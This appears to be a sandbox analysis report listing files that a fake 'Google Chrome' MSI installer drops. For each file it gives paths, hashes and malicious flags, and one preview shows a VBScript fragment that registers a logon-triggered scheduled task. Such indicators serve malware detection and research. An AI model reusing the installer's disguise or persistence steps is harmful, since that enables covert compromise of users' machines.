                                      SHA1:BD14CB9D3808873888921DC893CA1CF48546676C
                                      SHA-256:0A9C8F037925570FFE1D36E19E194B7D67346306C93296745AE4FE7002F02D3E
                                      SHA-512:63F6F83F5BE656BD6F17CDF31AB4D8158E55E50BB3D72B4DF2FE08B132F166CE446B5C25A8A1860CE72DF1568AF71EE32B898A861FF99EDF09A5666A813C962A
                                      Malicious:true
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):278816
                                      Entropy (8bit):6.535584786524981
                                      Encrypted:false
                                      SSDEEP:6144:sRyuVhSBeXTIxjqJ64G6peRXpmAOPfu0RtwQrHQc/mw3Ia:s8qhSBeX2jqJ6FvXpmVfu0bwtovIa
                                      MD5:D7770594FA82330B50573FDD8A2CCF3D
                                      SHA1:5A64FA8671AB64A2E974637917B987D001B4EDAF
                                      SHA-256:350339ACF9B3CA3055823C67AB568390D54C35DA4692E33C3A7E62FBC7C4B9A9
                                      SHA-512:CC2D672F15C5674B2DE8024E204D533EF9347DD635633074BF8C38A96209355B5A10D14706677060B01D5E329FC465259E8996587A0A2EA7F2FF7C7B5DBDD64A
                                      Malicious:true
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):355616
                                      Entropy (8bit):6.161744248585241
                                      Encrypted:false
                                      SSDEEP:6144:5uU5uwSATioVOG31+aOEyxTM+d9eoh0bLc+ORwynlQc/mwu:5bRSATioVR31+2ynDeoScRwi+om
                                      MD5:458F24A910A1022B5DB6219E7A838CE5
                                      SHA1:DCA5EEF5567B54F8FD4BA11E40D766E4C1BB30B3
                                      SHA-256:E0D786B4823F4D4137A2110A2E867237ABC5BC29604A55D6A172199E56CE3BE7
                                      SHA-512:4D373720EB6BB4B901E250CF4DB778BE10F4FF4A260D62112DBF5E28F139C1C1C26B5B7268B7B3167E83E74BDF3BF6CC44C518127AFE1B26EFD5E874D2865B99
                                      Malicious:true
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):162080
                                      Entropy (8bit):5.986584434229805
                                      Encrypted:false
                                      SSDEEP:3072:DwzvOYTt5YP/aKavT/DvbEvK9aobNI2B+flkL7OjUuxGftPyhdY55s2ZUuyNFhyV:GtiP/aK2h9H/B+/
                                      MD5:BAF0B64AF9FCEAB44942506F3AF21C87
                                      SHA1:E78FB7C2DB9C1B1F9949F4FCD4B23596C1372E05
                                      SHA-256:581EDECA339BB8C5EBC1D0193AD77F5CAFA329C5A9ADF8F5299B1AFABED6623B
                                      SHA-512:EE590E4D5CCDD1AB6131E19806FFD0C12731DD12CF7BFB562DD8F5896D84A88EB7901C6196C85A0B7D60AEE28F8CFBBA62F8438D501EABD1BB01EC0B4F8D8004
                                      Malicious:true
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):560008
                                      Entropy (8bit):5.909191877084503
                                      Encrypted:false
                                      SSDEEP:6144:xMbrcPhnaq5rl9C2p3lgpwVjrjowwZGg81UFotKrwIzSCiMmkEelsXtWWkwEEp4w:rT5rTvDMwb6KZZsEFtawEEp1ui7v
                                      MD5:0527DF9BDAAEA7250291EFCB5B33B709
                                      SHA1:1B6B3511C30AA66A0A0258578A4B695DB2FBDE36
                                      SHA-256:7FA367A644670ED94A01BC0927996D93B82EA2658BB7D84C99C648F12B6A61F1
                                      SHA-512:D8F49F954112E744B161246759AA0A6B106125A9B936E98C3F57C4535B1E7866ADFFE3E1699412EF8D549A84121F9492F67BB504B91FFFD384BBC2E89611631B
                                      Malicious:true
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1427336
                                      Entropy (8bit):6.155905635785417
                                      Encrypted:false
                                      SSDEEP:24576:LRCJ0FRnE2wKTK/t9sWQTxybUJu0PQGGL0xkFeyD6JB:NEkE2xK/t9RQTZJ2GGAcPDu
                                      MD5:063AF51C19F29BCDFD26C1BEBDC9ACE6
                                      SHA1:810817459E322BA44815DF62702B9C8FE04B26FB
                                      SHA-256:C6EF12669E1D0A3D0F54AD7CD516D5CF2DDF81EDC350C3AAFAA51C8EA9226A73
                                      SHA-512:5FFFF7F49B68004EB8F02522724B45D9C6CFA5CB45FF1C5F3CD93F1C65F0CADC322CC09A777B933C64650A7666C6204B67F9B1ADF266BA2D1CE537C17F4A99A9
                                      Malicious:true
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):414600
                                      Entropy (8bit):6.498913790154161
                                      Encrypted:false
                                      SSDEEP:6144:A185Y9Pd04VB/XrghF6fraV5A8B2NNy7gTC+kTXcEXS+aM22PQ+d83qUspBOXUUi:y/GFnZH9woGojR39mbEGM8M
                                      MD5:D9F36FF27DC0D08FD384A99BB801A24A
                                      SHA1:886287B85E2B57E05E61EE582DD1595F7E620765
                                      SHA-256:96AEA19B11327AE4200396E84F06A4746A926F43B688C22E60B370DED1CF6D58
                                      SHA-512:032F0F0E6200383DD9A4A7628E1EF5B67EA6FCFD3A872CD2FA0B952CCC3286B10550526C01E0294068E7D3995714EFDF798607A51CF4681B8295B8D8493963DD
                                      Malicious:true
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1537416
                                      Entropy (8bit):6.78098762929255
                                      Encrypted:false
                                      SSDEEP:24576:+PonniDaQDrTwkQLAxDQKbt3R0ydNywVvpg8yq4lVfuzGUHttBXf+ib7STJMaUmA:gonniDasrTk+tB5xxg8ASzzjcibmTJTE
                                      MD5:C83DD90D61BAE5CF1D4B0620649726D6
                                      SHA1:CDB21AF237425523D230A1738C4111776B3E8318
                                      SHA-256:B5DF19432F50AD434CA860173C9EB0DC6FDFACA48F75A3B416D038C213D089DA
                                      SHA-512:480CB660931EECE9FEE17FCB60B5C467CEB033D7D2F9FC0CF37B82DBC7443918935BA5A24AAEB8A284C95820ECCAB382E67342E6F0038C4D36B36F51D04DC412
                                      Malicious:true
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3880328
                                      Entropy (8bit):6.770205397989409
                                      Encrypted:false
                                      SSDEEP:98304:ZnL1LHHgG/M90itlALhFlHovpaz82uukT:Z5gG/M9I5UaY7
                                      MD5:856D1285704805940B8379E81B18F3EB
                                      SHA1:AAE6852E7F86A8163CA5A63178A7CCEB1C50FF67
                                      SHA-256:2E21F70ADCBE5FE3D51EB9236FC23E071E675C802BFEEC2CA5C0A41EEF35E9A2
                                      SHA-512:50B61C980C176F2F32BD4E353187D5DB9F3D3D7D01486105DA95D7E7BF153386D2808DC94909B4998E05ACCEBE6CC388ECAD8246D236A89529F9A1274B34885C
                                      Malicious:true
                                      Process:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):9844736
                                      Entropy (8bit):7.99998096243402
                                      Encrypted:true
                                      SSDEEP:196608:qRlibNUmuwBTq1rmORsopQx6KUlel00nSzVnTHY8ouGs6HMfk3dW6Mw:Q2NUmJTq4DMelbSFjY8D6HMfymw
                                      MD5:75D0239E2D42FCB09AD6DD6380E58441
                                      SHA1:D146D55D9E3CAC254414C5D3DCCD56E55C62F229
                                      SHA-256:530A033F92543E1FE9061E5043F0EACBEC5A0DB300B862E8470FCD0C36FE07C1
                                      SHA-512:18FE51D9F9DED140E9A12F1C20C8FA4FA049892C480DCF933A29B15F3E3F063BE410245071DA77CAC34626FCBF60FE067F42D39EB4B03CFFD2FB88413314E695
                                      Malicious:true
                                      Process:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):2400
                                      Entropy (8bit):4.792885848790128
                                      Encrypted:false
                                      SSDEEP:48:hz+30oOXel0JWbXw5s0DxonDuWKhjNV4+M52ui4T0MK8mdFDub0nLVtg:hzkeKXX0JDSDjmJS528lK8wY8Vi
                                      MD5:21D79CC9604AAA9318A89437DC462D05
                                      SHA1:AC84E4F72F4C1BDB6A6DD59FFF450959DD432BBE
                                      SHA-256:9C6FD2485D6FB37C997F99AA621B8CA08335FEDBC8284E7DE4F98D5B5CFEEBAD
                                      SHA-512:32D427D933A0CB80D0EBE151DC8F693C46A92F248D84379AF85E196E8020379FFAC518C1B1470B9267B77DF81A6F82C4E752D9AC80D4963F1E3281BB3E685731
                                      Malicious:true
                                      Preview:const TriggerTypeLogon = 9..' A constant that specifies an executable action...const ActionTypeExecutable = 0 ....'********************************************************..' Create the TaskService object...Set service = CreateObject("Schedule.Service")..Call service.Connect()....'********************************************************..' Get a folder to create a task definition in. ..Dim rootFolder..Set rootFolder = service.GetFolder("\")....' The taskDefinition variable is the TaskDefinition object...Dim taskDefinition..' The flags parameter is 0 because it is not supported...Set taskDefinition = service.NewTask(0) ....'********************************************************..' Define information about the task.....' Set the registration info for the task by ..' creating the RegistrationInfo object...Dim regInfo..Set regInfo = taskDefinition.RegistrationInfo..regInfo.Description = "Task will execute Notepad when a " & _.. "user logs on."..regInfo.Author = "Author Name"....' Se
                                      Process:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):7168
                                      Entropy (8bit):4.658263260341292
                                      Encrypted:false
                                      SSDEEP:96:d6kLgAfFGeOEdsmW2ZL0lpTSupF/ojJnkYY2oS6k9Tvg3uB:ZkA2mBpYpMkd2Ik9Tvgq
                                      MD5:A5FC151170B4BEF53A2918729AA6D3A9
                                      SHA1:5C4AA81EABF2B681D950813EFE91B4959DEF907F
                                      SHA-256:7462F9337A959B4F57B58CB2002016DD1BBDBD6A9B7BA339C933A5B6C1BBC324
                                      SHA-512:48FACE9B188040377787E0FF0E0725FED5CEFEE4AA5CE4B8CA89AF40352FEA559D446941858BB1A3DB6CACF901CBCAE62C8005EE616829974B6A7A9F01B8472B
                                      Malicious:true
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 936, Revision Number: {924DFDB4-5E1D-409E-8393-FA9658AA79C4}, Number of Words: 2, Subject: Google Chrome, Author: Google, Name of Creating Application: Google Chrome, Template: ;2052, Comments: Installer Google Chrome , Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Apr 23 15:38:46 2024, Last Saved Time/Date: Tue Apr 23 15:38:46 2024, Last Printed: Tue Apr 23 15:38:46 2024, Number of Pages: 450
                                      Category:dropped
                                      Size (bytes):16345600
                                      Entropy (8bit):7.984095740506337
                                      Encrypted:false
                                      SSDEEP:393216:qCBN2m9uaDsIqvv3/L/2m68UzYWIMWLBM36dmdRwhm7YLp:RkmqvHv1M/q8dOh
                                      MD5:86561E111E7CE97E13A9936B9B4BA849
                                      SHA1:61CD40DA9253A367E416C9AB67E73738F18948C3
                                      SHA-256:BD462515EA9FFE66FC27D9BAA0FCC4BF733385829C2FC5676129AAEEB2E0AF88
                                      SHA-512:33D26416412D777FB2758BC41B44A9E9107906879C85BB4609702242DEB2BCD83ED8A5F5DA7A1D3E4662CA7B31DBFBBE1FAA8364952546FF600136E8C2CF7D54
                                      Malicious:false
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):448362
                                      Entropy (8bit):6.547715008215351
                                      Encrypted:false
                                      SSDEEP:6144:55CrUPJ84ilfnCHLDWEIMjq5vR4rPCrUPJ84ilfnCHLDWEIMjq5vR4r1a:5jPJHi1yIMG5OrNPJHi1yIMG5Org
                                      MD5:4830EA14D6C7E8A34D024E8EBD788B48
                                      SHA1:81118FBAF3763D650DB6B256ABBF8F8D44412211
                                      SHA-256:2A9FFBEEFC0550F69CA0011A99CDE64EB98B135734358B298D6A28538AE49C69
                                      SHA-512:3F8E89E8B8188E9F72229D330688B2768DBBA046DC5AB1AFB04D071CC65D65069DE9E571E3AAF4C3E41A63D743FB6168268AA342BA11C54DA008AC52D843429F
                                      Malicious:false
                                      Preview:...@IXOS.@.....@.f.X.@.....@.....@.....@.....@.....@......&.{26E6D275-3FC7-41A2-B8C2-458B639029D2}..Google Chrome..sutup-Chrome.13.26.x64.msi.@.....@.....@.....@........&.{924DFDB4-5E1D-409E-8393-FA9658AA79C4}.....@.....@.....@.....@.......@.....@.....@.......@......Google Chrome......Rollback..ck(W.V...d\O:...[1]..RollbackCleanup..ck(W Rd..Y.N.e.N...e.N:. .[.1.]....@.......@........ProcessComponents..ck(W.f.e.~.N.l.Q.....@.....@.....@.]....&.{70366BA3-A10F-4C67-AC8A-4DFE5BE2D7FD}L.01:\Software\Google\{5E4E6E84-1289-4C07-9813-C6AA1F6D7FF2}\AI_INSTALLPERUSER.@.......@.....@.....@......&.{DB28640C-691F-42B8-A615-644DCA0203A3}3.C:\Program Files (x86)\WeGame\adapt_for_imports.dll.@.......@.....@.....@......&.{D8A595F1-49AD-4C63-BD58-95E574F97962}&.C:\Program Files (x86)\ChromeSetup.exe.@.......@.....@.....@......&.{AA4F795E-E67B-4915-8003-F1548190EC51}D.C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\1.@.......@.....@.....@......&.{0EE71893-E09E-47F1-B09B-F0F2A40DE943}D.
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):220264
                                      Entropy (8bit):6.529506114174054
                                      Encrypted:false
                                      SSDEEP:3072:R5Lor2Lp9Zjxt8Bd9XF6N5RTNL5tludmMiz84Fak4lNAKIpwCHLDd4CHKECNE3QY:XCrUPJ84ilfnCHLDWEIMjq5vR4r7
                                      MD5:E7E51805794E1A71C5E2BDD45F4EE5C9
                                      SHA1:D178D4C1DEB28018A180AC3A6182E923660E16F5
                                      SHA-256:F6216D72F4D9A7D46F3B878650B2F26982E4F05B8B5CE363A60C564159DB781F
                                      SHA-512:5632CEAE01B6AAD3D806BCDF2BDAF40E487CB3DC48D83597429DC4E9C5867A878A87CA06C3A2E43E8FC532295B5B8EFBB472BD07C33F6B6629E877E3392EB576
                                      Malicious:true
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):417896
                                      Entropy (8bit):6.8043660889312765
                                      Encrypted:false
                                      SSDEEP:6144:Yb+2H9tragDe0dMOalADuFx9Ychph0lhSMXlBXBWNvvIFNa1yAIn:t2dMrl7Fph0lhSMXlknI8yAIn
                                      MD5:0901970C2066AED8A97D75AAF1FD3146
                                      SHA1:F0C700A4BFCEBAD9843E01A88BAB71B5F38996D8
                                      SHA-256:41F827E6ADDFC71D68CD4758336EDF602349FB1230256EC135121F95C670D773
                                      SHA-512:00E12FD2D752A01DFA75550FFAF3A2F337171CEC93CD013083C37137A455E93BEBD72E7D8487EC3E1DE5FE22994F058829A6597765612278C20D601192CBE733
                                      Malicious:true
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):417896
                                      Entropy (8bit):6.8043660889312765
                                      Encrypted:false
                                      SSDEEP:6144:Yb+2H9tragDe0dMOalADuFx9Ychph0lhSMXlBXBWNvvIFNa1yAIn:t2dMrl7Fph0lhSMXlknI8yAIn
                                      MD5:0901970C2066AED8A97D75AAF1FD3146
                                      SHA1:F0C700A4BFCEBAD9843E01A88BAB71B5F38996D8
                                      SHA-256:41F827E6ADDFC71D68CD4758336EDF602349FB1230256EC135121F95C670D773
                                      SHA-512:00E12FD2D752A01DFA75550FFAF3A2F337171CEC93CD013083C37137A455E93BEBD72E7D8487EC3E1DE5FE22994F058829A6597765612278C20D601192CBE733
                                      Malicious:true
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):220264
                                      Entropy (8bit):6.529506114174054
                                      Encrypted:false
                                      SSDEEP:3072:R5Lor2Lp9Zjxt8Bd9XF6N5RTNL5tludmMiz84Fak4lNAKIpwCHLDd4CHKECNE3QY:XCrUPJ84ilfnCHLDWEIMjq5vR4r7
                                      MD5:E7E51805794E1A71C5E2BDD45F4EE5C9
                                      SHA1:D178D4C1DEB28018A180AC3A6182E923660E16F5
                                      SHA-256:F6216D72F4D9A7D46F3B878650B2F26982E4F05B8B5CE363A60C564159DB781F
                                      SHA-512:5632CEAE01B6AAD3D806BCDF2BDAF40E487CB3DC48D83597429DC4E9C5867A878A87CA06C3A2E43E8FC532295B5B8EFBB472BD07C33F6B6629E877E3392EB576
                                      Malicious:true
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):20480
                                      Entropy (8bit):1.170792491614045
                                      Encrypted:false
                                      SSDEEP:12:JSbX72FjzGiAGiLIlHVRp9h/7777777777777777777777777vDHFY9pwWt/l0i5:JRJQI5ZO6F
                                      MD5:305A27199F320D9A47A8219C2A0A1CBC
                                      SHA1:14F1B64D87DC3835753AD3CF3723BFF0D604E235
                                      SHA-256:6013BEF949960672E8E768E363C0EBE85E1583DCB7AAACA64638F4F0FE43FBBF
                                      SHA-512:A834C96B014511E7E11E2A1DBD95A3941595C7E55E93D4E2FD8574813C88B8394D09288F37A33CFFFEC16261A2BE4859B9B0A26E1E0EDE3A62AFBCD7F55A9A4B
                                      Malicious:false
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):20480
                                      Entropy (8bit):1.509525634457451
                                      Encrypted:false
                                      SSDEEP:48:88Phj7uRc06WXJ+nT542GhS9SnAErCyMF4SjT9a:Thj71VnT3GU9BwCs
                                      MD5:BFB5342BA5B855CFF339E3AB828E0718
                                      SHA1:E98E9776F7B0F6A2E80FBB0FB2D1314BF5372E87
                                      SHA-256:DB55298F40AF92CC83178EC085D6FAA7821CBC7F5E3309E9F57D6743CE52DE7E
                                      SHA-512:1A1D75C16D65B38787721140DEFFAF8FBB4F718D6C4B11F687A1EDCF986C93D2FD619BE95248CB7F7891CB0B393E6B7385C9DDD8F2F05F5E713EB13D437B8ACF
                                      Malicious:false
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):364484
                                      Entropy (8bit):5.365503357975419
                                      Encrypted:false
                                      SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauP:zTtbmkExhMJCIpEM
                                      MD5:98BF285C5916BE08BD290044B5C2655D
                                      SHA1:6895F60BDC48290AE9E394631E84869980CAD7C5
                                      SHA-256:F9BC60E2490462AF7F1356B217AA6BE375774F3EED9B179977C5513CA55770BA
                                      SHA-512:3153E733F3E72C6C1755D6C936088B60D39578E485AA7026E2C18D99962E1F694DCF846850608C71D07F750289ED231D6DF4D702278883704191194E1CFF38F9
                                      Malicious:false
                                      Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):301856
                                      Entropy (8bit):6.654439927825066
                                      Encrypted:false
                                      SSDEEP:6144:5habloKMimZI46P5Bzb854fgJs3uVAOs5qiwckGIk0ggwJhi/rQx+D8P:al5MiU50jb854fgfK5qiw8Ik0ggwJhis
                                      MD5:4C3832FBE84B8CE63D8E3AB7D76F9983
                                      SHA1:EEA2D91B7D7D2CDF79BB9F354AF7A33D6014F544
                                      SHA-256:8FE2226E8BEC5A45D4B819359192AB92446B54859BF8877573AB7A3C8B4ADA76
                                      SHA-512:E6E316BF3414FFB2674BF240760B2617CED755B8A34AD4B3213BCCA6EA9A0AA3C2E094319D709A958F603B72197BFA34B100DBE87B618E17601B2E0DAC749F84
                                      Malicious:true
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):402208
                                      Entropy (8bit):6.361069039231634
                                      Encrypted:false
                                      SSDEEP:12288:ge4r7rSB+2zUM2WJoROZEUT2N9oqs3Kw8q76uIx+Z:g5razT2N9fgKw76uIxq
                                      MD5:DAE993327723122C9288504A62E9F082
                                      SHA1:153427B6B0A5628360472F9AB0855A8A93855F57
                                      SHA-256:38903DEC79D41ABDA6FB7750B48A31FFCA418B3EAB19395A0A5D75D8A9204EE7
                                      SHA-512:517FC9EAF5BF193E984EEE4B739B62DF280D39CD7B6749BEC61D85087CC36BB942B1EBAED73E4A4A6E9FA3C85A162F7214D41EA25B862A4CF853E1129C10293D
                                      Malicious:true
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):162080
                                      Entropy (8bit):5.986584434229805
                                      Encrypted:false
                                      SSDEEP:3072:DwzvOYTt5YP/aKavT/DvbEvK9aobNI2B+flkL7OjUuxGftPyhdY55s2ZUuyNFhyV:GtiP/aK2h9H/B+/
                                      MD5:BAF0B64AF9FCEAB44942506F3AF21C87
                                      SHA1:E78FB7C2DB9C1B1F9949F4FCD4B23596C1372E05
                                      SHA-256:581EDECA339BB8C5EBC1D0193AD77F5CAFA329C5A9ADF8F5299B1AFABED6623B
                                      SHA-512:EE590E4D5CCDD1AB6131E19806FFD0C12731DD12CF7BFB562DD8F5896D84A88EB7901C6196C85A0B7D60AEE28F8CFBBA62F8438D501EABD1BB01EC0B4F8D8004
                                      Malicious:true
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):108320
                                      Entropy (8bit):6.4795260643674
                                      Encrypted:false
                                      SSDEEP:3072:OMxJ7Rfp8K172YPrN4vzT+PlZpsB+0H+EOZvMs:OMH7cCxPRpsB+s94Ms
                                      MD5:FF2D1B951CAFE2A3B88A168900844303
                                      SHA1:71A367F119E30C346C8B4A028CCFC8A122B0E53E
                                      SHA-256:F8E20A4EFB9BB32AF39E3CBC414412B3B01C0442ABFE214A58BC3ECCFFFD35B7
                                      SHA-512:6A35C8AB850552B64B3FC8853079559A69A302CEA6A8D44DB4BCC71322995E2EB3485B02317B2115D5236BE38A8A090751E55DAD6A59D181B843857DAD7E1690
                                      Malicious:true
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):185632
                                      Entropy (8bit):6.208575989324197
                                      Encrypted:false
                                      SSDEEP:3072:9ni3ZsI1rXRAmWt9h8QlLISqG+T1DpV9qEKLmoY46WeJbJ+O3dnD7:9ni3ZsQrBAmWt9h8QlLISZWVJohkn7d
                                      MD5:0FE3644C905D5547B3A855B2DC3DB469
                                      SHA1:80B38B7860A341F049F03BD5A61782FF7468EAC7
                                      SHA-256:7D5C0ED6617DBC1B78D2994A6E5BBDA474B5F4814D4A34D41F844CE9A3A4EB66
                                      SHA-512:E2CF9E61C290599F8F92214FAE67CCE23206A907C0AB27A25BE5D70F05D610A326395900B8ED8ED54F9ECBDDFD1B890F10280D00DBCDAD72E0272D23F0DB1E53
                                      Malicious:true
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):223008
                                      Entropy (8bit):6.650401463042642
                                      Encrypted:false
                                      SSDEEP:6144:Bqml5a6EdkQxiUmRQColKGAOPQK2GwIgfx+qSfF0:gml5a6EdkQgUmR7G9QK3wJx+qSfF0
                                      MD5:021C57C74DE40F7C3B4FCF58A54D3649
                                      SHA1:EF363AB45B6FE3DD5B768655ADC4188AADF6B6FD
                                      SHA-256:04ADF40BA58D0AB892091C188822191F2597BC47DAB8B92423E8FC546DC437EF
                                      SHA-512:77E3BBB08C661285A49A66E8090A54F535727731C44B7253EA09FFE9548BAE9D120EF38A67DFA8A5D8DA170DDE3E9C1928B96C64DFC07B7F67F93B478937C018
                                      Malicious:true
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):108320
                                      Entropy (8bit):6.479395999944146
                                      Encrypted:false
                                      SSDEEP:3072:vER5AhC48S1m2YPrh4qR8vLZksB+0Hdqxl:vEXAe6QP4ksB+sYL
                                      MD5:B191834EB918C5BCAA46E594561C53C9
                                      SHA1:1EAB0F1C6C4E6E36C454556022E80677F1A8360E
                                      SHA-256:0FA78EEA190E3AE9DDB0E6CD85EB5188947CE0BA748FC6D567ADE48B1FB3AE27
                                      SHA-512:D16BB62290C752866A150E6B52AE9A6478D8901B194A71F5768896E311A6B5750F4D6741501D8D807EE85C09F65EF2468992A384436838B61FAC5F955CDAD696
                                      Malicious:true
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1376816
                                      Entropy (8bit):7.919887049125556
                                      Encrypted:false
                                      SSDEEP:24576:PJvKzcVkyEq9DRho1jFP8ltPP01Ws7+wFPEl9ix4fpUzoQDt+egElxdqFWVCGC:FKzcCyEq9DRho/ctH01Ws74rA4RUBDHo
                                      MD5:8884A9547AA410B697EFAD097F2B0013
                                      SHA1:F3E7B8A25DF24532F48DAE750388E1749169B620
                                      SHA-256:24E46969CEA3B387E899D5DA33820B988A9944100E47ABA3D1960C4080F28B9B
                                      SHA-512:E03EB2EB3F8414B2C9AA9431B63082FB195EA499DC7C1EA9E67E649C81B5C13D922FDA30C5B62CA15A9BCCBC6D7F6EFA4A92EF604216E80EF3EE14D10E38B1C4
                                      Malicious:true
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):2040096
                                      Entropy (8bit):6.851106187237549
                                      Encrypted:false
                                      SSDEEP:24576:3HhPvGlhhk7g+Kq8RpRBr0saiXFkGB9zkdpglcKQGFRglutbceGlsIVkuV6WlZv4:R+677eRFoqFkak3gllbcvkaT1y3ezvN
                                      MD5:DCE0FD2B11B3E4C79A8F276A1633E9AE
                                      SHA1:568021B117ACE23458F1A86CD195D68DE7164FA9
                                      SHA-256:C917AD2BF8C286AE0B4D3E9203AB3DA641AF4C8D332E507319EE4DF914D6219C
                                      SHA-512:BA89867FD2BEA6166B6E27C2A03A9A4759AEE1AFFE75D592F381D9CB42FACBA1AF1535F009A26F2613338B50DE13B6576AB23C4E24D90827739F1678923FF771
                                      Malicious:true
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43296
                                      Entropy (8bit):4.795449103754647
                                      Encrypted:false
                                      SSDEEP:384:3r1C4k4sI+h2cjIYi6yIDYcAM+o/8E9VF0NyFzgMd:BCZJBMYi6yKYcAMxkEfgM
                                      MD5:46F8834DD275C0C165D4E57E0F074310
                                      SHA1:7ACBFB7E88E9E29E2DC45083F94A95A409F03109
                                      SHA-256:91AC6C9686D339BAA0056B1260F4FD1394CE965B1957AA485E83AE73492F46B5
                                      SHA-512:B615FE41B226273693DA423969A834B72C5148F5438E7A782D39191AD3013E2ABFA10D651FA2DED878ABB118E31831DC7DEC51729B3235CEBB2B5D7F3BA2ADE1
                                      Malicious:true
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):42272
                                      Entropy (8bit):4.793537445820405
                                      Encrypted:false
